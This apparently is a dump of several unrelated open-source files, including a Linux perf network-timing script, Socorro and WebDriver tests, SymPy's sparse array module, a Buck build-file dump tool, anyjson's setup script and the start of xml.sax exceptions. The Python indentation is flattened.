tx_queue_list = []; # list of packets which pass through dev_queue_xmit
of_count_tx_queue_list = 0; # overflow count
tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit
of_count_tx_xmit_list = 0; # overflow count
tx_free_list = []; # list of packets which is freed
# options
show_tx = 0;
show_rx = 0;
dev = 0; # store a name of device specified by option "dev="
debug = 0;
# indices of event_info tuple
EINFO_IDX_NAME= 0
EINFO_IDX_CONTEXT=1
EINFO_IDX_CPU= 2
EINFO_IDX_TIME= 3
EINFO_IDX_PID= 4
EINFO_IDX_COMM= 5
# Calculate a time interval(msec) from src(nsec) to dst(nsec)
def diff_msec(src, dst):
return (dst - src) / 1000000.0
# Display a process of transmitting a packet
def print_transmit(hunk):
if dev != 0 and hunk['dev'].find(dev) < 0:
return
print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \
(hunk['dev'], hunk['len'],
nsecs_secs(hunk['queue_t']),
nsecs_nsecs(hunk['queue_t'])/1000,
diff_msec(hunk['queue_t'], hunk['xmit_t']),
diff_msec(hunk['xmit_t'], hunk['free_t']))
# Format for displaying rx packet processing
PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)"
PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)"
PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)"
PF_JOINT= " |"
PF_WJOINT= " | |"
PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)"
PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)"
PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)"
PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)"
PF_CONS_SKB= " | consume_skb(+%.3fmsec)"
# Display a process of received packets and interrputs associated with
# a NET_RX softirq
def print_receive(hunk):
show_hunk = 0
irq_list = hunk['irq_list']
cpu = irq_list[0]['cpu']
base_t = irq_list[0]['irq_ent_t']
# check if this hunk should be showed
if dev != 0:
for i in range(len(irq_list)):
if irq_list[i]['name'].find(dev) >= 0:
show_hunk = 1
break
else:
show_hunk = 1
if show_hunk == 0:
return
print "%d.%06dsec cpu=%d" % \
(nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu)
for i in range(len(irq_list)):
print PF_IRQ_ENTRY % \
(diff_msec(base_t, irq_list[i]['irq_ent_t']),
irq_list[i]['irq'], irq_list[i]['name'])
print PF_JOINT
irq_event_list = irq_list[i]['event_list']
for j in range(len(irq_event_list)):
irq_event = irq_event_list[j]
if irq_event['event'] == 'netif_rx':
print PF_NET_RX % \
(diff_msec(base_t, irq_event['time']),
irq_event['skbaddr'])
print PF_JOINT
print PF_SOFT_ENTRY % \
diff_msec(base_t, hunk['sirq_ent_t'])
print PF_JOINT
event_list = hunk['event_list']
for i in range(len(event_list)):
event = event_list[i]
if event['event_name'] == 'napi_poll':
print PF_NAPI_POLL % \
(diff_msec(base_t, event['event_t']), event['dev'])
if i == len(event_list) - 1:
print ""
else:
print PF_JOINT
else:
print PF_NET_RECV % \
(diff_msec(base_t, event['event_t']), event['skbaddr'],
event['len'])
if 'comm' in event.keys():
print PF_WJOINT
print PF_CPY_DGRAM % \
(diff_msec(base_t, event['comm_t']),
event['pid'], event['comm'])
elif 'handle' in event.keys():
print PF_WJOINT
if event['handle'] == "kfree_skb":
print PF_KFREE_SKB % \
(diff_msec(base_t,
event['comm_t']),
event['location'])
elif event['handle'] == "consume_skb":
print PF_CONS_SKB % \
diff_msec(base_t,
event['comm_t'])
print PF_JOINT
def trace_begin():
global show_tx
global show_rx
global dev
global debug
for i in range(len(sys.argv)):
if i == 0:
continue
arg = sys.argv[i]
if arg == 'tx':
show_tx = 1
elif arg =='rx':
show_rx = 1
elif arg.find('dev=',0, 4) >= 0:
dev = arg[4:]
elif arg == 'debug':
debug = 1
if show_tx == 0 and show_rx == 0:
show_tx = 1
show_rx = 1
def trace_end():
# order all events in time
all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME],
b[EINFO_IDX_TIME]))
# process all events
for i in range(len(all_event_list)):
event_info = all_event_list[i]
name = event_info[EINFO_IDX_NAME]
if name == 'irq__softirq_exit':
handle_irq_softirq_exit(event_info)
elif name == 'irq__softirq_entry':
handle_irq_softirq_entry(event_info)
elif name == 'irq__softirq_raise':
handle_irq_softirq_raise(event_info)
elif name == 'irq__irq_handler_entry':
handle_irq_handler_entry(event_info)
elif name == 'irq__irq_handler_exit':
handle_irq_handler_exit(event_info)
elif name == 'napi__napi_poll':
handle_napi_poll(event_info)
elif name == 'net__netif_receive_skb':
handle_netif_receive_skb(event_info)
elif name == 'net__netif_rx':
handle_netif_rx(event_info)
elif name == 'skb__skb_copy_datagram_iovec':
handle_skb_copy_datagram_iovec(event_info)
elif name == 'net__net_dev_queue':
handle_net_dev_queue(event_info)
elif name == 'net__net_dev_xmit':
handle_net_dev_xmit(event_info)
elif name == 'skb__kfree_skb':
handle_kfree_skb(event_info)
elif name == 'skb__consume_skb':
handle_consume_skb(event_info)
# display receive hunks
if show_rx:
for i in range(len(receive_hunk_list)):
print_receive(receive_hunk_list[i])
# display transmit hunks
if show_tx:
print " dev len Qdisc " \
" netdevice free"
for i in range(len(tx_free_list)):
print_transmit(tx_free_list[i])
if debug:
print "debug buffer status"
print "----------------------------"
print "xmit Qdisc:remain:%d overflow:%d" % \
(len(tx_queue_list), of_count_tx_queue_list)
print "xmit netdevice:remain:%d overflow:%d" % \
(len(tx_xmit_list), of_count_tx_xmit_list)
print "receive:remain:%d overflow:%d" % \
(len(rx_skb_list), of_count_rx_skb_list)
# called from perf, when it finds a correspoinding event
def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec):
if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
return
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
all_event_list.append(event_info)
def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm,
irq, irq_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
irq, irq_name)
all_event_list.append(event_info)
def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret)
all_event_list.append(event_info)
def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
napi, dev_name)
all_event_list.append(event_info)
def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr,
skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, dev_name)
all_event_list.append(event_info)
def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen, rc, dev_name):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen, rc ,dev_name)
all_event_list.append(event_info)
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
skbaddr, protocol, location):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, protocol, location)
all_event_list.append(event_info)
def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr)
all_event_list.append(event_info)
def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm,
skbaddr, skblen):
event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
skbaddr, skblen)
all_event_list.append(event_info)
def handle_irq_handler_entry(event_info):
(name, context, cpu, time, pid, comm, irq, irq_name) = event_info
if cpu not in irq_dic.keys():
irq_dic[cpu] = []
irq_record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time}
irq_dic[cpu].append(irq_record)
def handle_irq_handler_exit(event_info):
(name, context, cpu, time, pid, comm, irq, ret) = event_info
if cpu not in irq_dic.keys():
return
irq_record = irq_dic[cpu].pop()
if irq != irq_record['irq']:
return
irq_record.update({'irq_ext_t':time})
# if an irq doesn't include NET_RX softirq, drop.
if 'event_list' in irq_record.keys():
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_raise(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'sirq_raise'})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_irq_softirq_entry(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]}
def handle_irq_softirq_exit(event_info):
(name, context, cpu, time, pid, comm, vec) = event_info
irq_list = []
event_list = 0
if cpu in irq_dic.keys():
irq_list = irq_dic[cpu]
del irq_dic[cpu]
if cpu in net_rx_dic.keys():
sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t']
event_list = net_rx_dic[cpu]['event_list']
del net_rx_dic[cpu]
if irq_list == [] or event_list == 0:
return
rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time,
'irq_list':irq_list, 'event_list':event_list}
# merge information realted to a NET_RX softirq
receive_hunk_list.append(rec_data)
def handle_napi_poll(event_info):
(name, context, cpu, time, pid, comm, napi, dev_name) = event_info
if cpu in net_rx_dic.keys():
event_list = net_rx_dic[cpu]['event_list']
rec_data = {'event_name':'napi_poll',
'dev':dev_name, 'event_t':time}
event_list.append(rec_data)
def handle_netif_rx(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu not in irq_dic.keys() \
or len(irq_dic[cpu]) == 0:
return
irq_record = irq_dic[cpu].pop()
if 'event_list' in irq_record.keys():
irq_event_list = irq_record['event_list']
else:
irq_event_list = []
irq_event_list.append({'time':time, 'event':'netif_rx',
'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name})
irq_record.update({'event_list':irq_event_list})
irq_dic[cpu].append(irq_record)
def handle_netif_receive_skb(event_info):
global of_count_rx_skb_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
if cpu in net_rx_dic.keys():
rec_data = {'event_name':'netif_receive_skb',
'event_t':time, 'skbaddr':skbaddr, 'len':skblen}
event_list = net_rx_dic[cpu]['event_list']
event_list.append(rec_data)
rx_skb_list.insert(0, rec_data)
if len(rx_skb_list) > buffer_budget:
rx_skb_list.pop()
of_count_rx_skb_list += 1
def handle_net_dev_queue(event_info):
global of_count_tx_queue_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, dev_name) = event_info
skb = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time}
tx_queue_list.insert(0, skb)
if len(tx_queue_list) > buffer_budget:
tx_queue_list.pop()
of_count_tx_queue_list += 1
def handle_net_dev_xmit(event_info):
global of_count_tx_xmit_list
(name, context, cpu, time, pid, comm,
skbaddr, skblen, rc, dev_name) = event_info
if rc == 0: # NETDEV_TX_OK
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
skb['xmit_t'] = time
tx_xmit_list.insert(0, skb)
del tx_queue_list[i]
if len(tx_xmit_list) > buffer_budget:
tx_xmit_list.pop()
of_count_tx_xmit_list += 1
return
def handle_kfree_skb(event_info):
(name, context, cpu, time, pid, comm,
skbaddr, protocol, location) = event_info
for i in range(len(tx_queue_list)):
skb = tx_queue_list[i]
if skb['skbaddr'] == skbaddr:
del tx_queue_list[i]
return
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if rec_data['skbaddr'] == skbaddr:
rec_data.update({'handle':"kfree_skb",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
def handle_consume_skb(event_info):
(name, context, cpu, time, pid, comm, skbaddr) = event_info
for i in range(len(tx_xmit_list)):
skb = tx_xmit_list[i]
if skb['skbaddr'] == skbaddr:
skb['free_t'] = time
tx_free_list.append(skb)
del tx_xmit_list[i]
return
def handle_skb_copy_datagram_iovec(event_info):
(name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info
for i in range(len(rx_skb_list)):
rec_data = rx_skb_list[i]
if skbaddr == rec_data['skbaddr']:
rec_data.update({'handle':"skb_copy_datagram_iovec",
'comm':comm, 'pid':pid, 'comm_t':time})
del rx_skb_list[i]
return
| gpl-2.0 |
twobraids/socorro | webapp-django/crashstats/manage/tests/test_utils.py | 14 | 4695 | import os
from unittest import TestCase
from nose.tools import eq_
from crashstats.manage import utils
SAMPLE_CSV_FILE_PCI_DATABASE_COM = os.path.join(
os.path.dirname(__file__),
'sample-graphics.csv'
)
SAMPLE_CSV_FILE_PCI_IDS = os.path.join(
os.path.dirname(__file__),
'sample-pci.ids'
)
class TestUtils(TestCase):
def test_string_hex_to_hex_string(self):
func = utils.string_hex_to_hex_string
eq_(func('919A'), '0x919a')
eq_(func('0x919A'), '0x919a')
eq_(func('221'), '0x0221')
eq_(func('0221'), '0x0221')
eq_(func('0x0221'), '0x0221')
def test_parse_graphics_devices_iterable__pcidatabase(self):
with open(SAMPLE_CSV_FILE_PCI_DATABASE_COM) as iterable:
things = []
function = utils.pcidatabase__parse_graphics_devices_iterable
for thing in function(iterable):
things.append(thing)
# to be able to make these assertions you really need to
# be familiar with the file sample-graphics.csv
# basic test
eq_(
things[0],
{
'adapter_hex': '0x002f',
'adapter_name': '.43 ieee 1394 controller',
'vendor_hex': '0x0033',
'vendor_name': 'Paradyne Corp.'
}
)
# same vendor as before
eq_(
things[1],
{
'adapter_hex': '0x0333',
'adapter_name': '1ACPI\\GenuineIntel_-_x86_Family_6_Model_'
'23\\_0 1ACPI\\GenuineIntel_-_x86_Family_6'
'_Model_23\\_0',
'vendor_hex': '0x0033',
'vendor_name': 'Paradyne Corp.'
}
)
# non-utf-8 encoded charater here
eq_(
things[2],
{
'adapter_hex': '0x08b2',
'adapter_name': u'123abc logitech QuickCam\ufffd Pro 4000',
'vendor_hex': '0x0033',
'vendor_name': 'Paradyne Corp.'
}
)
# two adapter_hexes split up
eq_(
things[3],
{
'adapter_hex': '0x0200',
'adapter_name': 'DS38xx Oregon Scientific',
'vendor_hex': '0x0553',
'vendor_name': 'Aiptek USA'
}
)
eq_(
things[4],
{
'adapter_hex': '0x0201',
'adapter_name': 'DS38xx Oregon Scientific',
'vendor_hex': '0x0553',
'vendor_name': 'Aiptek USA'
}
)
# the adapter_hex has a _ removed
eq_(
things[5],
{
'adapter_hex': '0x6128',
'adapter_name': 'USB\\VID_0C45&PID_6148&REV_0101 USB PC '
'Camera Plus',
'vendor_hex': '0x0553',
'vendor_name': 'Aiptek USA'
}
)
eq_(
things[6],
{
'adapter_hex': '0x0221',
'adapter_name': 'LavaPort Quad-650 PCI C/D',
'vendor_hex': '0x0407',
'vendor_name': 'Lava Computer MFG Inc.'
}
)
eq_(len(things), 7)
def test_parse_graphics_devices_iterable__pci_ids(self):
with open(SAMPLE_CSV_FILE_PCI_IDS) as iterable:
things = []
function = utils.pci_ids__parse_graphics_devices_iterable
for thing in function(iterable):
things.append(thing)
# to be able to make these assertions you really need to
# be familiar with the file sample-graphics.csv
# basic test
eq_(
things[0],
{
'adapter_hex': '0x8139',
'adapter_name': 'AT-2500TX V3 Ethernet',
'vendor_hex': '0x0010',
'vendor_name': 'Allied Telesis, Inc'
}
)
eq_(
things[1],
{
'adapter_hex': '0x0001',
'adapter_name': 'PCAN-PCI CAN-Bus controller',
'vendor_hex': '0x001c',
'vendor_name': 'PEAK-System Technik GmbH'
}
)
eq_(len(things), 6)
| mpl-2.0 |
larsbergstrom/servo | tests/wpt/web-platform-tests/webdriver/tests/get_element_property/get.py | 16 | 3380 | import pytest
from tests.support.asserts import assert_error, assert_success
from tests.support.inline import inline
def get_element_property(session, element_id, prop):
return session.transport.send(
"GET", "session/{session_id}/element/{element_id}/property/{prop}".format(
session_id=session.session_id,
element_id=element_id,
prop=prop))
def test_no_browsing_context(session, closed_window):
response = get_element_property(session, "foo", "id")
assert_error(response, "no such window")
def test_element_not_found(session):
response = get_element_property(session, "foo", "id")
assert_error(response, "no such element")
def test_element_stale(session):
session.url = inline("<input id=foobar>")
element = session.find.css("input", all=False)
session.refresh()
response = get_element_property(session, element.id, "id")
assert_error(response, "stale element reference")
def test_property_non_existent(session):
session.url = inline("<input>")
element = session.find.css("input", all=False)
response = get_element_property(session, element.id, "foo")
assert_success(response, None)
assert session.execute_script("return arguments[0].foo", args=(element,)) is None
def test_content_attribute(session):
session.url = inline("<input value=foobar>")
element = session.find.css("input", all=False)
response = get_element_property(session, element.id, "value")
assert_success(response, "foobar")
def test_idl_attribute(session):
session.url = inline("<input value=foo>")
element = session.find.css("input", all=False)
session.execute_script("""arguments[0].value = "bar";""", args=(element,))
response = get_element_property(session, element.id, "value")
assert_success(response, "bar")
@pytest.mark.parametrize("js_primitive,py_primitive", [
("\"foobar\"", "foobar"),
(42, 42),
([], []),
({}, {}),
("null", None),
("undefined", None),
])
def test_primitives(session, js_primitive, py_primitive):
session.url = inline("""
<input>
<script>
const input = document.querySelector("input");
input.foobar = {js_primitive};
</script>
""".format(js_primitive=js_primitive))
element = session.find.css("input", all=False)
response = get_element_property(session, element.id, "foobar")
assert_success(response, py_primitive)
@pytest.mark.parametrize("js_primitive,py_primitive", [
("\"foobar\"", "foobar"),
(42, 42),
([], []),
({}, {}),
("null", None),
("undefined", None),
])
def test_primitives_set_by_execute_script(session, js_primitive, py_primitive):
session.url = inline("<input>")
element = session.find.css("input", all=False)
session.execute_script("arguments[0].foobar = {}".format(js_primitive), args=(element,))
response = get_element_property(session, element.id, "foobar")
assert_success(response, py_primitive)
def test_mutated_element(session):
session.url = inline("<input type=checkbox>")
element = session.find.css("input", all=False)
element.click()
assert session.execute_script("return arguments[0].hasAttribute('checked')", args=(element,)) is False
response = get_element_property(session, element.id, "checked")
assert_success(response, True)
| mpl-2.0 |
rahuldan/sympy | sympy/tensor/array/sparse_ndim_array.py | 20 | 5831 | from __future__ import print_function, division
import functools
import itertools
from sympy.core.sympify import _sympify
from sympy import S, Dict, flatten, SparseMatrix, Basic, Tuple
from sympy.tensor.array.mutable_ndim_array import MutableNDimArray
from sympy.tensor.array.ndim_array import NDimArray, ImmutableNDimArray
class SparseNDimArray(NDimArray):
def __new__(self, *args, **kwargs):
return ImmutableSparseNDimArray(*args, **kwargs)
def __getitem__(self, index):
"""
Get an element from a sparse N-dim array.
Examples
========
>>> from sympy.tensor.array import MutableSparseNDimArray
>>> a = MutableSparseNDimArray(range(4), (2, 2))
>>> a
[[0, 1], [2, 3]]
>>> a[0, 0]
0
>>> a[1, 1]
3
>>> a[0]
0
>>> a[2]
2
"""
# `index` is a tuple with one or more slices:
if isinstance(index, tuple) and any([isinstance(i, slice) for i in index]):
def slice_expand(s, dim):
if not isinstance(s, slice):
return (s,)
start, stop, step = s.indices(dim)
return [start + i*step for i in range((stop-start)//step)]
sl_factors = [slice_expand(i, dim) for (i, dim) in zip(index, self.shape)]
eindices = itertools.product(*sl_factors)
array = [self._sparse_array.get(self._parse_index(i), S.Zero) for i in eindices]
nshape = [len(el) for i, el in enumerate(sl_factors) if isinstance(index[i], slice)]
return type(self)(array, nshape)
else:
# `index` is a single slice:
if isinstance(index, slice):
start, stop, step = index.indices(self._loop_size)
retvec = [self._sparse_array.get(ind, S.Zero) for ind in range(start, stop, step)]
return retvec
# `index` is a number or a tuple without any slice:
else:
index = self._parse_index(index)
return self._sparse_array.get(index, S.Zero)
@classmethod
def zeros(cls, *shape):
"""
Return a sparse N-dim array of zeros.
"""
return cls({}, shape)
def tomatrix(self):
"""
Converts MutableDenseNDimArray to Matrix. Can convert only 2-dim array, else will raise error.
Examples
========
>>> from sympy.tensor.array import MutableSparseNDimArray
>>> a = MutableSparseNDimArray([1 for i in range(9)], (3, 3))
>>> b = a.tomatrix()
>>> b
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
"""
if self.rank() != 2:
raise ValueError('Dimensions must be of size of 2')
mat_sparse = {}
for key, value in self._sparse_array.items():
mat_sparse[self._get_tuple_index(key)] = value
return SparseMatrix(self.shape[0], self.shape[1], mat_sparse)
def __iter__(self):
def iterator():
for i in range(self._loop_size):
yield self[i]
return iterator()
def reshape(self, *newshape):
new_total_size = functools.reduce(lambda x,y: x*y, newshape)
if new_total_size != self._loop_size:
raise ValueError("Invalid reshape parameters " + newshape)
return type(self)(*(newshape + (self._array,)))
class ImmutableSparseNDimArray(SparseNDimArray, ImmutableNDimArray):
def __new__(cls, *args, **kwargs):
shape, flat_list = cls._handle_ndarray_creation_inputs(*args, **kwargs)
shape = Tuple(*map(_sympify, shape))
loop_size = functools.reduce(lambda x,y: x*y, shape) if shape else 0
# Sparse array:
if isinstance(flat_list, (dict, Dict)):
sparse_array = Dict(flat_list)
else:
sparse_array = {}
for i, el in enumerate(flatten(flat_list)):
if el != 0:
sparse_array[i] = _sympify(el)
sparse_array = Dict(sparse_array)
self = Basic.__new__(cls, sparse_array, shape, **kwargs)
self._shape = shape
self._rank = len(shape)
self._loop_size = loop_size
self._sparse_array = sparse_array
return self
def __setitem__(self, index, value):
raise TypeError("immutable N-dim array")
class MutableSparseNDimArray(MutableNDimArray, SparseNDimArray):
def __new__(cls, *args, **kwargs):
shape, flat_list = cls._handle_ndarray_creation_inputs(*args, **kwargs)
self = object.__new__(cls)
self._shape = shape
self._rank = len(shape)
self._loop_size = functools.reduce(lambda x,y: x*y, shape) if shape else 0
# Sparse array:
if isinstance(flat_list, (dict, Dict)):
self._sparse_array = dict(flat_list)
return self
self._sparse_array = {}
for i, el in enumerate(flatten(flat_list)):
if el != 0:
self._sparse_array[i] = _sympify(el)
return self
def __setitem__(self, index, value):
"""Allows to set items to MutableDenseNDimArray.
Examples
========
>>> from sympy.tensor.array import MutableSparseNDimArray
>>> a = MutableSparseNDimArray.zeros(2, 2)
>>> a[0, 0] = 1
>>> a[1, 1] = 1
>>> a
[[1, 0], [0, 1]]
"""
index = self._parse_index(index)
if not isinstance(value, MutableNDimArray):
value = _sympify(value)
if isinstance(value, NDimArray):
return NotImplementedError
if value == 0 and index in self._sparse_array:
self._sparse_array.pop(index)
else:
self._sparse_array[index] = value
| bsd-3-clause |
romanoid/buck | scripts/migrations/dump.py | 4 | 5568 | #!/usr/bin/env python3
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import json
import logging
import os
from typing import List
import build_file
import label
import repository
class StoreKeyValuePair(argparse.Action):
"""
Parser action that populates a dictionary with '=' separated key-value
pairs.
"""
def __call__(self, parser, namespace, values, option_string=None):
key, value = values.split("=")
dest_dict = {}
if hasattr(namespace, self.dest) and getattr(namespace, self.dest):
dest_dict = getattr(namespace, self.dest)
dest_dict[key] = value
setattr(namespace, self.dest, dest_dict)
def dump_exported_symbols(args):
"""Print all symbols exported using include_defs in a build file."""
logging.debug("Dumping exported symbols for " + args.build_file)
bf = build_file.from_path(args.build_file)
repo = repository.Repository(args.repository, args.cell_roots)
symbols = bf.get_exported_symbols_transitive_closure(repo)
if args.json:
print(json.dumps(symbols))
else:
print(os.linesep.join(symbols))
def dump_export_map(args):
"""
Prints export map that includes all included definitions and symbols they
export.
"""
logging.debug("Dumping export map for " + args.build_file)
bf = build_file.from_path(args.build_file)
repo = repository.Repository(args.repository, args.cell_roots)
export_map = bf.get_export_map(repo)
def to_load_import_string(import_label: label):
pkg = import_label.package
# include_defs package includes a file name, so we have to split it
# into file name
file_name = pkg.split("/")[-1]
# and it's prefix - which is the new package
pkg = "/".join(pkg.split("/")[:-1])
load_fn_cell = args.cell_prefix + import_label.cell if import_label.cell else ""
return load_fn_cell + "//" + pkg + ":" + file_name
if args.use_load_function_import_string_format:
new_export_map = {}
for import_string, exported_symbols in export_map.items():
new_export_map[
to_load_import_string(label.from_string(import_string))
] = exported_symbols
export_map = new_export_map
if args.print_as_load_functions:
def to_load_function(import_label: label, symbols: List[str]):
import_string = to_load_import_string(import_label)
function_args = map(lambda s: '"%s"' % s, symbols)
return 'load("%s", %s)' % (import_string, ",".join(function_args))
load_functions = []
for import_string, exported_symbols in export_map.items():
load_functions.append(
to_load_function(label.from_string(import_string), exported_symbols)
)
if args.json:
print(json.dumps(load_functions))
else:
print(os.linesep.join(load_functions))
elif args.json:
print(json.dumps(export_map))
else:
for import_string, exported_symbols in export_map.items():
print(import_string + ":")
for exported_symbol in exported_symbols:
print(" " * 2 + exported_symbol)
def main():
parser = argparse.ArgumentParser(
description="Dumps requested build file information."
)
subparsers = parser.add_subparsers()
exported_symbols_parser = subparsers.add_parser("exported_symbols")
exported_symbols_parser.set_defaults(func=dump_exported_symbols)
export_map_parser = subparsers.add_parser("export_map")
export_map_parser.add_argument(
"--print_as_load_functions",
action="store_true",
help="Print export map as a series of load functions which import all "
"symbols exported by respective imported files.",
)
export_map_parser.add_argument(
"--cell_prefix",
default="",
help="The prefix to use for cells in import strings.",
)
export_map_parser.add_argument(
"--use_load_function_import_string_format",
action="store_true",
help="Use load function import string syntax instead of include_defs.",
)
export_map_parser.set_defaults(func=dump_export_map)
parser.add_argument("build_file", metavar="FILE")
parser.add_argument("--json", action="store_true")
parser.add_argument(
"--cell_root", action=StoreKeyValuePair, metavar="CELL=PATH", dest="cell_roots"
)
parser.add_argument(
"--repository", metavar="PATH", help="Path to the repository managed by Buck."
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="Enabled verbose diagnostic."
)
args = parser.parse_args()
logging_level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(
level=logging_level,
format=("%(asctime)s [%(levelname)s][%(filename)s:%(lineno)d] %(message)s"),
)
args.func(args)
if __name__ == "__main__":
main()
| apache-2.0 |
ActionAgile/trellostats | tests/test_cli.py | 1 | 1063 | import os
import pytest
import shortuuid
from mock import Mock, MagicMock, patch
import click
from click.testing import CliRunner
import trellostats
from trellostats.cli import cli, token, resetdb, snapshot
from trellostats.trellostats import TrelloStatsException
from trellostats.settings import BOARD_URL, LIST_URL, ACTION_URL, TOKEN_URL
app_key = os.environ.get('TRELLOSTATS_APP_KEY')
app_token = os.environ.get('TRELLOSTATS_APP_TOKEN')
def test_cli_ctx_init():
runner = CliRunner()
result = runner.invoke(cli)
assert result.exit_code == 0
assert result.output.startswith("Usage")
@patch('trellostats.cli.Snapshot')
def test_reset_db(mock_snapshot):
runner = CliRunner()
result = runner.invoke(resetdb, input="y")
assert result.output.startswith("Are you sure")
assert mock_snapshot.drop_table.called_once_with(fail_silently=True)
assert mock_snapshot.drop_table.called
@patch('trellostats.cli.TrelloStats')
def test_token(mock_ts):
runner = CliRunner()
result = runner.invoke(token)
assert result.exit_code == 0
assert mock_ts.called
| bsd-3-clause |
eeshangarg/oh-mainline | vendor/packages/anyjson/setup.py | 17 | 1349 | import sys
extra = {}
if sys.version_info >= (3, 0):
extra.update(use_2to3=True)
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup, find_packages
author = "Rune Halvorsen"
email = "runefh@gmail.com"
version = "0.3.1"
desc = """Wraps the best available JSON implementation available in a common interface"""
setup(name='anyjson',
version=version,
description=desc,
long_description=open("README").read(),
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.1',
],
keywords='json',
author=author,
author_email=email,
url='http://bitbucket.org/runeh/anyjson',
license='BSD',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
zip_safe=False,
platforms=["any"],
test_suite = 'nose.collector',
**extra
)
| agpl-3.0 |
mm112287/2015cda-24 | static/Brython3.1.0-20150301-090019/Lib/xml/sax/_exceptions.py | 625 | 4885 | """Different kinds of SAX Exceptions"""
#in brython the 4 lines below causes an $globals['Exception'] error
#import sys
#if sys.platform[:4] == "java":
# from java.lang import Exception
#del sys
# ===== SAXEXCEPTION =====
class SAXException(Exception):
"""Encapsulate an XML error or warning. This class can contain
basic error or warning information from either the XML parser or
the application: you can subclass it to provide additional
functionality, or to add localization. Note that although you will
